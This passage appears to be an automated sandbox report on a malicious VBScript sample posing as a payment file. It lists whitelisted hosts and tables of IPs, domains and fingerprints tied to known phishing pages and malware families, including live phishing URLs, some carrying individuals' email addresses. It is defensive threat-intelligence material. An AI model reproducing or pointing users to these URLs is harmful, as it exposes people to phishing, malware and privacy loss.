                                                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:50
                                                                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                            Sample name:Payment_Activity_0079_2025-2-17.vbs
                                                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                                                            Classification:mal100.expl.evad.winVBS@108/300@72/100
                                                                                                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                                                            • Found application associated with file extension: .vbs

                                                                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, Runtimeuserer.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.21.239, 204.79.197.239, 142.250.186.110, 13.107.6.158, 20.191.45.158, 142.250.184.200, 23.15.178.170, 23.15.178.171, 23.15.178.184, 23.15.178.193, 23.15.178.192, 23.15.178.176, 23.15.178.169, 23.15.178.179, 23.15.178.185, 199.232.210.172, 48.209.162.134, 172.217.16.200, 142.250.74.200, 2.19.244.127, 142.251.40.163, 142.251.40.99, 142.250.80.67, 13.107.246.45, 94.245.104.56, 20.190.159.73, 150.171.27.10, 142.251.40.238, 4.150.155.223, 150.171.28.10, 23.200.0.34, 20.12.23.50, 142.250.80.104, 13.107.246.40, 173.222.162.55, 142.250.80.74, 142.250.80.66, 142.250.80.35, 142.251.40.193
                                                                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, data-edge.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.googletagmanager.com, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, bat.bing.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, prod-agic-ne-1.northeurope.cloudapp.azure.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.google-analytics.com, www.bing.com, prod-agic-ne-5.northeurope.cloudapp.azure.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fonts.googleapis.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, otelrules.azureedge.net, api.edgeoffer
                                                                                                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                                                                            02:16:39API Interceptor110x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                            02:16:44API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                            54.209.129.63https://attservero.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                              https://tinyurl.com/2s4xvzc8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                http://currentlyatt412.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                  162.159.61.3Shipment-100032756.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    MDE_File_Sample_baee32e2367a787814415d166abb7bc5b9061c5c.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                        NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          H3Ze9Uj.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                            Mansion_setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                              Faersafe_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                FAIRSAFE_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  Faersafe_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                    QEIFBCQW.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                      23.199.48.23https://innerworks621-my.sharepoint.com/:w:/g/personal/fbayoumi_iwexpress_com/EV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ?rtime=X7A0bhVM3UgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                          https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                            http://marketplace-item-details-98756222.zya.meGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                              https://truj.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                https://pub-dbce98adcacd4e49a4cb64cc36d27ee5.r2.dev/login.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  http://www.die-senioren.deGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    edge_x86_KB91412024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                      edge_x86_KB91412024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                        https://ibit.ly/let-us-feature-your-business-204Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                          98.82.156.207https://wetransfer.com/downloads/5d034427b565a9bdfd0591fd879aff3220250217090443/69c235ffa888576aae0973561b9a7b3520250217090510/9d193d?t_exp=1740042283&t_lsid=5d87b514-85ed-4a06-8b2a-8df7f75e3a46&t_network=email&t_rid=ZW1haWx8Njc3N2M3OWY0ZGZkZTcwNmYwNWY5OWYy&t_s=download_link&t_ts=1739783110Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                            http://colruyt.usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                              http://amazon.org.bz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                https://files.fm/f/wpd3hsuh55?share_email_id=15c922d&share_email_skip_notify=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                  https://currentlyatt765432.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                    https://bellsales.github.io/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                      https://autheanfication-proconnexion.inovaperf.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                        https://attservices928.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                          https://mailtrack.io/l/625f89b1d8729ffb05b765dfa6f9ddaa6986b97cGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                            https://wsdf2.pages.dev/musicGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                              d2fashanjl7d9f.cloudfront.nethttp://colruyt.usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.57
                                                                                                                                                                                                                                                                                                                                                              SERVED SUMMON LETTER 01-30-2025.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.66
                                                                                                                                                                                                                                                                                                                                                              https://urlz.fr/tJIZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.121
                                                                                                                                                                                                                                                                                                                                                              http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.161.109
                                                                                                                                                                                                                                                                                                                                                              http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.161.109
                                                                                                                                                                                                                                                                                                                                                              phish_alert_iocp_v1.4.48 (68).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.121
                                                                                                                                                                                                                                                                                                                                                              http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+KGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.57
                                                                                                                                                                                                                                                                                                                                                              Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.15
                                                                                                                                                                                                                                                                                                                                                              https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.66.102.66
                                                                                                                                                                                                                                                                                                                                                              https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.239.50.73
                                                                                                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.comShipment-100032756.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                                              Customer support.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                                              Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                                              hHtR1O06GH.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                                              MDE_File_Sample_baee32e2367a787814415d166abb7bc5b9061c5c.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                                              updater.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                                              NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                                              NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousACR StealerBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                                              H3Ze9Uj.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                                                                              • 172.64.41.3

                                                                                                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                              AKAMAI-ASN1EUCustomer support.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 23.219.82.40
                                                                                                                                                                                                                                                                                                                                                              Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                              • 23.219.82.8
                                                                                                                                                                                                                                                                                                                                                              Hilix.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 23.63.94.30
                                                                                                                                                                                                                                                                                                                                                              http://ln.run/aktivasi-tarif-Bank-BSI-idGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 23.44.201.244
                                                                                                                                                                                                                                                                                                                                                              http://dappfix-web.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 2.16.164.8
                                                                                                                                                                                                                                                                                                                                                              http://steamcommunity-cash.com/gift/id=572931441Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 23.200.3.237
                                                                                                                                                                                                                                                                                                                                                              http://webmailuzzgora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 88.221.110.227
                                                                                                                                                                                                                                                                                                                                                              https://untag-smd.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 104.124.11.16
                                                                                                                                                                                                                                                                                                                                                              https://webmailbhutanfootbal.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 88.221.110.227
                                                                                                                                                                                                                                                                                                                                                              https://shorten.is/AdsPayments101Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 88.221.110.136
                                                                                                                                                                                                                                                                                                                                                              AMAZON-AESUSHilix.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 34.235.30.68
                                                                                                                                                                                                                                                                                                                                                              Hilix.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                              • 54.175.53.14
                                                                                                                                                                                                                                                                                                                                                              res.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 54.208.66.44
                                                                                                                                                                                                                                                                                                                                                              Hilix.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.208.29.70
                                                                                                                                                                                                                                                                                                                                                              Hilix.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.208.17.44
                                                                                                                                                                                                                                                                                                                                                              http://shaw-107890.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 3.233.158.25
                                                                                                                                                                                                                                                                                                                                                              http://bucket-7e4da277.s3.amazonaws.com/4690d4.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 3.5.24.78
                                                                                                                                                                                                                                                                                                                                                              https://cryptosmallstar.github.io/mycake-swap-interface-v2-buildGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 52.22.224.4
                                                                                                                                                                                                                                                                                                                                                              http://dappfix-web.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 52.201.116.12
                                                                                                                                                                                                                                                                                                                                                              http://webmailuzzgora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 34.230.188.173
                                                                                                                                                                                                                                                                                                                                                              FREEWHEELUShttps://files.fm/f/kxnrfq5y8g?share_email_id=15e8956&share_email_skip_notify=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.81
                                                                                                                                                                                                                                                                                                                                                              https://attservero.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.81
                                                                                                                                                                                                                                                                                                                                                              http://amazon.org.bz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.80
                                                                                                                                                                                                                                                                                                                                                              https://files.fm/f/wpd3hsuh55?share_email_id=15c922d&share_email_skip_notify=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.81
                                                                                                                                                                                                                                                                                                                                                              http://%5B%22https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Femail.bcbssettlement.com%2Fc%2FeJxkzL1OwzAQAOCnscfIPv9m8IAgERVqQRTm6OxcVaPERcnB87Owdf_0zclG8M5JSjqY2Gvd91FekzYqO3LxgkXb4rxykA1hCME4F0KRNYECp0AFFZQ3sQNvvLUzImU7a62FVbnkfSfmhVZq3JXbKpd0Zf7ehXkQMAoYdyo_G3X3UsA4E9O21oZcb01u6YuwUaOON7zUgo1JWIVLrv83p_Pzy_T2PhwPn8fp9PpxeBym83B6kr8J_gIAAP__kjFIFA&data=05%7C02%7Cjeanene.traficante%40albint.com%7C1fdf299aa52a4a651cc208dd4745f85b%7Cff3d33ae31364152812675e51f4a1404%7C0%7C0%7C638745088046675413%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=fGCIRyUUbeFPm7FcRl%2FZ7oH%2FXi3jt5H1pOFROm4%2BJoY%3D&reserved=0%22,%20%222f9fb485af706049f5d23654ae36fb8f%22%5DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.80
                                                                                                                                                                                                                                                                                                                                                              https://official--live--ledgr.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.54.250.80
                                                                                                                                                                                                                                                                                                                                                              https://mettameasklogin.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.57.158.115
                                                                                                                                                                                                                                                                                                                                                              https://hhdtte3773.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.57.158.115
                                                                                                                                                                                                                                                                                                                                                              https://desktop----sso-cdn-ledgr.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.57.158.115
                                                                                                                                                                                                                                                                                                                                                              https://eng-sso--ledger-live--m-cdn.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 154.57.158.115
                                                                                                                                                                                                                                                                                                                                                              AMAZON-AESUSHilix.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 34.235.30.68
                                                                                                                                                                                                                                                                                                                                                              Hilix.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                              • 54.175.53.14
                                                                                                                                                                                                                                                                                                                                                              res.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 54.208.66.44
                                                                                                                                                                                                                                                                                                                                                              Hilix.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.208.29.70
                                                                                                                                                                                                                                                                                                                                                              Hilix.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 18.208.17.44
                                                                                                                                                                                                                                                                                                                                                              http://shaw-107890.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 3.233.158.25
                                                                                                                                                                                                                                                                                                                                                              http://bucket-7e4da277.s3.amazonaws.com/4690d4.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 3.5.24.78
                                                                                                                                                                                                                                                                                                                                                              https://cryptosmallstar.github.io/mycake-swap-interface-v2-buildGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 52.22.224.4
                                                                                                                                                                                                                                                                                                                                                              http://dappfix-web.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 52.201.116.12
                                                                                                                                                                                                                                                                                                                                                              http://webmailuzzgora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                              • 34.230.188.173

                                                                                                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eRooming list.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              PO-G0170-PF3F-25-0329.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              useeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              file.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              file.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              Shipment-100032756.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56
                                                                                                                                                                                                                                                                                                                                                              Customer support.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              • 185.39.18.56

                                                                                                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9022482340699004
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9o:0J7adfWuK0p/QDfKoPeuP0aN4fqoxzn
                                                                                                                                                                                                                                                                                                                                                              MD5:CD3EA61CEEB3D815A06B28BF096E1874
                                                                                                                                                                                                                                                                                                                                                              SHA1:53C381D7B15118FA812835D3F9F06410BD2E1D82
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5321CA1AF8C926755EE34CA49AB872273AAE1F47CF440E3A7B70856881FB276C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:88C58C5572D1B3B6360EA89351593238BF000DDEC09F0A045C0A06C778E97BB643651C895930111EF6C7893A8EFC4CB6FA30B46872708BE09B40276D76551A95
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdc9a029d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7880301725787202
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:XSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:XazaPv4V4fXq2UaB
                                                                                                                                                                                                                                                                                                                                                              MD5:9DB1B923A3A62A69FB97939B8D1EAFA9
                                                                                                                                                                                                                                                                                                                                                              SHA1:EB857B3A63BAC3EDF2E6E221CD1E49ADF69EE65E
                                                                                                                                                                                                                                                                                                                                                              SHA-256:2F289946763921858886BE42CE2435189773532079E1C792963D11C79E7D5FE4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3CD7ACDAE3F9BAD40EC19BBFF901C0B9C9CBA410B14E1572052DCCF9304369FF7FFB3EC6FAD827C19143244C4814D1B18B8965779A3DFC868D33B3C1F1C13820
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...... ...............X\...;...{......................X............{.......}..h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{....................................U.....}m6................W.%......}...........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
